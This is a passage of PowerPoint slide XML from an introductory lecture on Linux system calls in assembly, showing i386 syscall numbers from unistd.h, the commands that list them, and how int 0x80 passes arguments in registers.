        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="90487" tIns="44450" rIns="90487" bIns="44450">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Obtained </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>the following command</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -A 3 "Standard file descriptors" /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/include/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unistd.h</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="183353670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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Obtained from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>unistd.h</a:t>
            </a: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smtClean="0"/>
              <a:t>Linux system calls in assembly</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1104900" y="1628839"/>
            <a:ext cx="7211516" cy="3936975"/>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000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ifndef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> _ASM_I386_UNISTD_H_</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define _ASM_I386_UNISTD_H_</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> * This file contains the system call numbers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NR_exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NR_fork</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NR_read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NR_write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NR_open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                 5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NR_close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NR_waitpid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>              7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NR_creat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NR_link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                 9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NR_unlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>              10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NR_execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>              11</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NR_chdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>               12</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NR_time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                13</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NR_mknod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>               14</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NR_chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>               15</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NR_lchown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>              16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NR_break</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>               17</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NR_oldstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>18</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="5835412"/>
            <a:ext cx="7571184" cy="782265"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="90487" tIns="44450" rIns="90487" bIns="44450">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Obtained </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>the following command</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>head -n 25 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/include/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>asm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unistd.h</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="277798051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smtClean="0"/>
              <a:t>System calls in Linux</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>32-bit programs call the kernel by issuing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>interrupt 0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>Assembly instruction </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int 0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>Actually has been depreciated in 64-bit by “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sysenter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>We will switch into kernel mode and then jump to the handler for the proper system call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>The system call ID is specified in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>E.g. __NR_write, which is 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>The parameters are stored in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebx, %ecx, ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>The return value is stored in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>Negative value indicates an error</a:t>
            </a:r>
            <a:endParaRPr lang="is-IS" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1467941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5686524"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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>helloworld.s</a:t>
            </a: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normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hello world in assembly</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
